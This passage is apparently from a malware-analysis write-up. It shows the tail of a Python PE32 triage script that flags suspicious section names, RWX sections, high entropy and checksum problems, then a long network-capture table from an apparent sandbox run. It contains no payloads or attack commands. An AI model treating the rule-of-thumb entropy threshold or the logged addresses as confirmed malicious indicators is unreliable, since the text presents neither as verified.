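    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def parse_pe32(data: bytes) -> dict:
    """Extract entry RVA, stored checksum and the section table from a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:     # PE32 magic
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64
    sections = []
    for i in range(n_sections):
        hdr = opt + opt_size + 40 * i                        # IMAGE_SECTION_HEADER
        raw_name, vsize, va, rsize, rptr = struct.unpack_from("<8sIIII", data, hdr)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        sections.append({"name": raw_name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "chars": chars,
                         "raw": data[rptr:rptr + rsize]})
    return {"entry_rva": entry_rva, "checksum_off": checksum_off,
            "checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "sections": sections}


def triage(data: bytes) -> list:
    """Return (section name, finding code) pairs; an empty list means nothing stood out."""
    pe = parse_pe32(data)
    findings, entry_section = [], "<none>"
    for s in pe["sections"]:
        name = s["name"]
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], len(s["raw"])):
            entry_section = name
        if not name.strip():
            findings.append((name, "blank-name"))
        elif not set(name) <= NAME_CHARS:
            findings.append((name, "special-chars"))
        elif name not in STANDARD_SECTION_NAMES:
            findings.append((name, "non-standard-name"))
        if s["chars"] & SCN_MEM_WRITE and s["chars"] & SCN_MEM_EXECUTE:
            findings.append((name, "rwx"))
        if entropy(s["raw"]) > 7.0:                          # packed or encrypted data
            findings.append((name, "high-entropy"))
    if entry_section != ".text":
        findings.append((entry_section, "entry-outside-text"))
    if pe["checksum"] == 0:
        findings.append(("", "checksum-unset"))
    elif pe["checksum"] != pe_checksum(data, pe["checksum_off"]):
        findings.append(("", "checksum-mismatch"))
    return findings


def build_sample() -> bytes:
    """Constructed PE32 image (NOT the analysed file) shaped like the report's table:
    blank name, RWX everywhere, a uniformly distributed block, entry in .taggant."""
    rwx = SCN_CNT_INITIALIZED_DATA | SCN_MEM_EXECUTE | SCN_MEM_READ | SCN_MEM_WRITE
    rw = SCN_CNT_INITIALIZED_DATA | SCN_MEM_READ | SCN_MEM_WRITE
    specs = [(b"", 0x001000, bytes(0x200), rwx),             # (name, RVA, raw, chars)
             (b".rsrc", 0x6AA000, bytes(0x200), rw),
             (b"dkqxmldn", 0xA42000, bytes(range(256)) * 8, rwx),  # entropy 8.0
             (b".taggant", 0xC04000, b"\xE9" + bytes(0x1FF), rwx)]  # jmp stub
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                  # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(specs), 0, 0, 0, 0xE0, 0x0102)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                  # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0xC04000)          # AddressOfEntryPoint
    struct.pack_into("<I", hdr, opt + 28, 0x400000)          # ImageBase
    struct.pack_into("<II", hdr, opt + 32, 0x1000, 0x200)    # section/file alignment
    struct.pack_into("<I", hdr, opt + 64, 0)                 # CheckSum left unset
    body, raw_ptr = bytearray(), len(hdr)
    for i, (name, va, raw, chars) in enumerate(specs):
        sh = opt + 0xE0 + 40 * i
        struct.pack_into("<8sIIII", hdr, sh, name, len(raw), va, len(raw), raw_ptr)
        struct.pack_into("<I", hdr, sh + 36, chars)
        body += raw
        raw_ptr += len(raw)
    return bytes(hdr + body)


if __name__ == "__main__":
    for section, code in triage(build_sample()):
        print(f"{section or '(blank)':<10} {code}")
```

Run it as-is and it prints the findings for the constructed image; point triage() at the bytes of a real file and the same codes line up with the report's "PE file contains section with special chars", "Entry point lies outside standard sections" and "PE file contains an invalid checksum" signatures. The entropy threshold of 7.0 is a common rule of thumb rather than a published Joe Sandbox value, and the checksum routine follows the imagehlp algorithm that pefile also implements.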
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2024 13:09:00.283452034 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:00.283498049 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:00.283797026 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:00.339190006 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:00.339205980 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.144397974 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.145040035 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.145087957 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.147411108 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.147485018 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.149013042 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.149245977 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.158286095 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.158303022 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.201311111 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.791451931 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.791619062 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:02.791696072 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.927747011 CET | 49704 | 443 | 192.168.2.5 | 18.213.123.165
Nov 28, 2024 13:09:02.927781105 CET | 443 | 49704 | 18.213.123.165 | 192.168.2.5
Nov 28, 2024 13:09:04.817421913 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:04.939341068 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:04.943403959 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:04.944519997 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.064898968 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.064958096 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.064963102 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.065012932 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065013885 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.065023899 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065071106 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.065108061 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065118074 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065166950 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.065195084 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065218925 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065252066 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.065268040 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.065318108 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.065371990 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.184781075 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.184890985 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.185003996 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.185056925 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.185058117 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.185082912 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.185106039 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.185234070 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.185252905 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.185282946 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.185297966 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.185305119 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.185358047 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.227130890 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.227569103 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.347157001 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.347356081 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.391132116 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.511205912 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.511266947 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.715178013 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.715236902 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:05.967173100 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
Nov 28, 2024 13:09:05.967231989 CET | 49705 | 80 | 192.168.2.5 | 34.118.84.150
Nov 28, 2024 13:09:06.223543882 CET | 80 | 49705 | 34.118.84.150 | 192.168.2.5
                                                Nov 28, 2024 13:09:06.223617077 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.479182005 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.479387045 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.584913969 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.585105896 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.585177898 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.599431038 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.599489927 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.705837965 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705849886 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705861092 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705881119 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.705998898 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706037045 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706037998 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706082106 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706083059 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706095934 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706104040 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706125021 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706130028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706178904 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706284046 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706331968 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706341028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706367016 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706387043 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706417084 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706417084 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706469059 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706513882 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706562042 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706648111 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706657887 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706695080 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.706727982 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706815958 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706861019 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706937075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.706990957 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707077026 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707156897 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707245111 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707344055 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707400084 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707442045 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.707534075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707587004 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.707636118 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707681894 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.707743883 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707798004 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.707885027 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.707940102 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.707957029 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.708055973 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.708070993 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.708105087 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.721321106 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.721378088 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.767405033 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.767628908 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.828504086 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.828596115 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.828660965 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.828685999 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.828712940 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.828814983 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.828831911 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.828988075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829067945 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829107046 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829199076 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829209089 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829219103 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829281092 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829291105 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829334021 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829735994 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829879999 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.829916000 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829946995 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.829969883 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.829993963 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830058098 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830111027 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830112934 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830151081 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830164909 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830190897 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830199957 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830236912 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830308914 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830327034 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830351114 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830367088 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830446005 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830488920 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830496073 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830543041 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830574989 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830585003 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830629110 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.830663919 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830718040 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830790997 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830800056 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830871105 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.830912113 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831011057 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831023932 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831132889 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831144094 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831219912 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831247091 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831341028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831351042 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831384897 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831398964 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831434011 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831459045 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831513882 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831522942 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831578016 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831587076 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831624985 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831634045 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831712008 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831721067 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.831736088 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.842139959 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.842149019 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.842226028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.842236042 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948793888 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948807955 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948816061 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948824883 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948832989 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948843002 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948852062 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948870897 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.948879957 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.949810028 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.949834108 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.949856043 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.949920893 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.949929953 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.949970007 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950021982 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950068951 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.950136900 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.950171947 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950182915 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950190067 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950198889 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950203896 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950206995 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950216055 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950306892 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950316906 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950325012 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950335026 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950386047 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950417042 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950469017 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950478077 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950571060 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950579882 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950622082 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950661898 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950709105 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950742006 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950818062 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950828075 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950879097 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950887918 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950984955 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.950994968 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951011896 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951021910 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951092005 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951117992 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951144934 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951203108 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951282978 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951292038 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951410055 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951443911 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951491117 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951531887 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951667070 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951677084 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951738119 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951771975 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951817036 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951827049 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.951934099 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.995151043 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:06.995629072 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:06.995692968 CET4970580192.168.2.534.118.84.150
                                                Nov 28, 2024 13:09:07.070132017 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070158958 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070296049 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070307016 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070374966 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070393085 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070523024 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070626020 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070636988 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070646048 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070744991 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070765018 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070918083 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.070929050 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071055889 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071100950 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071150064 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071190119 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071316957 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071331978 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071393967 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071413040 CET804970534.118.84.150192.168.2.5
                                                Nov 28, 2024 13:09:07.071506023 CET804970534.118.84.150192.168.2.5
